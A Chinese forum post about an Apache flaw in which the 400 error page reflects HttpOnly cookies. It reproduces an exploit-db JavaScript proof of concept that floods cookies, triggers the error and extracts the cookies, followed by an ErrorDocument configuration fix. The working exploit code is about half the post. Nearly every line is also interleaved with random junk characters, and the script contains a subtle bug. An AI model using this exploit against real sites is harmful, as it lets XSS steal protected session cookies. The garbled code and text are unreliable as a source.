很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。* b* e- ?$ k2 e3 Y$ W2 `$ E
. a- V* F2 l5 c, p! J4 E用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:" j: @: ]$ j/ H) ]+ Z2 }) u: [1 ^2 v
# K, D& c$ x+ \7 {
R4 m! C7 Q+ j H! A8 A# v// http://www.exploit-db.com/exploits/18442/* @8 k( o1 Y0 ^1 y/ Y8 o
function setCookies (good) {
" E$ l; S S3 J$ E" `+ T( b0 j// Construct string for cookie value
, Q9 z. H# x6 t4 w5 S* |) dvar str = "";% l$ Y, v0 B+ c) t. g
for (var i=0; i< 819; i++) {
+ t: A! [/ c$ h2 rstr += "x";- M/ a- b u0 g' i' c
}1 H! J& ~' j' q. g O. q
// Set cookies
/ a) ^$ _) Z) sfor (i = 0; i < 10; i++) {, Y! ^( ? |8 ?+ G& \) l% N
// Expire evil cookie
. u" o9 |/ ^0 J! y- R# E/ pif (good) {
$ w& ^7 i# U4 A; u( Uvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";5 U; a6 \7 r9 N5 n' g3 r0 @% d5 ^4 B
}
5 S9 |! u# ?, |) `/ P0 I5 y// Set evil cookie$ F# J4 z8 ?4 w! v X
else {3 T7 i4 J+ T" L" t) L3 }: g) @1 K
var cookie = "xss"+i+"="+str+";path=/";8 z0 [* W9 _$ v8 A3 u7 q
}% w# }# D9 ?' d2 w. p
document.cookie = cookie;1 A2 t3 m4 Z; _* ]& q; x* L) g5 W
}
4 Q! K! F( |. l- R; d}% _; m# e6 N. [' }! u
function makeRequest() {
: }* G) n6 z4 hsetCookies();
4 Q' Z- X( Z% J u0 ?function parseCookies () {* X5 J4 E* U- c" N+ x+ R0 \8 s
var cookie_dict = {};
7 O8 Y* }/ F9 v( L/ X// Only react on 400 status6 L/ j8 I/ `9 J; S
if (xhr.readyState === 4 && xhr.status === 400) {" ]9 i( X$ X. M/ a( A
// Replace newlines and match <pre> content
3 G4 g; k1 U$ T4 s/ c+ g, vvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
+ b7 ?7 o, d, l, |, [if (content.length) {
$ _, q8 G, P) s# q" P- O! |// Remove Cookie: prefix% o# v/ J) v6 \
content = content[1].replace("Cookie: ", "");
0 B' r) D9 n7 W$ ^1 u: Fvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);6 V/ O# _7 e$ B; D
// Add cookies to object1 J4 F' t- v. F- I2 z
for (var i=0; i<cookies.length; i++) {2 \* o, M: t& d" B
var s_c = cookies.split('=',2);
5 ]$ K/ ]1 e9 L6 |/ L" Y, y7 [0 Scookie_dict[s_c[0]] = s_c[1];1 G5 Y# p c/ H6 t2 t; N4 }- X2 v
}+ ]: ^$ c! G7 ]: s
}: f7 b/ k: p. U
// Unset malicious cookies2 v1 d0 j2 N5 t. T6 D. H" t
setCookies(true);
7 j4 e' Z2 N- R4 ^alert(JSON.stringify(cookie_dict));
: j1 j b2 Z) o: D1 _+ u}
$ M J" p: L+ i: W) Y}* \# i2 A3 U/ }4 ]+ M
// Make XHR request: \6 |1 g0 l+ U4 F! ]4 L# d7 I6 `
var xhr = new XMLHttpRequest(); b+ U7 G; _. d/ v) z
xhr.onreadystatechange = parseCookies;
- x- N1 F x7 j' wxhr.open("GET", "/", true);0 ]8 d* I6 ^: U/ ?
xhr.send(null);, p4 ?# b$ {! a- m7 D
}" R+ h2 R1 m( t" v, I! U: t( n
makeRequest();/ |: u. m# C" v& L. \: r+ Q
+ Z. W7 v/ j @" U5 U& \
你就能看见华丽丽的400错误包含着cookie信息。1 o& G9 q! v9 Z& P" C T
- ^9 x! b& _/ w9 t, N! P h, b
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
8 f$ o7 C: f+ }6 Z# X1 R5 I$ h- u4 d0 p7 u' l# e* q) `; ^
修复方案:
$ A- o! _; h2 I+ |0 n
! {' X) B0 Y. AApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下6 a" Y, a6 ^- [) I% u+ T' \
Y8 Z6 R3 w( h" E& nIn the event of a problem or error, Apachecan be configured to do one of four things,
( r' x. D; t" k. O
: q7 x* X' y! T( d; R6 C+ o" S9 i1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
2 L4 @0 L% _* B7 H# F+ V2. output acustomized message输出一段信息/ l2 w8 S5 s, Y1 k1 d
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 7 t; m% z1 g$ o2 F. d
4. redirect to an external URL to handle theproblem/error转向一个外部URL5 A0 G; d; \, @% e) o4 @" H* T
7 r9 m) t5 f7 A
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
6 L% n' N# e4 T' [5 N/ ^4 r" P3 z3 w4 @* S) s7 c
Apache配置:# E9 Z. G# I" O. C Z
k" K, O9 c. o% b- W$ g2 {ErrorDocument400 " security test"7 F5 H# S* g# z( S. L+ G
2 R2 p/ u4 B3 m9 y
当然,升级apache到最新也可:)。& s) `. K" X5 u
* p. @0 F4 i2 Q, Y% C参考:http://httpd.apache.org/security/vulnerabilities_22.html
8 ?1 Q A5 G$ H l1 z4 [8 @: x: r! G, r; \( o
|
发表于 2013-4-19 19:15:43
收藏
支持
反对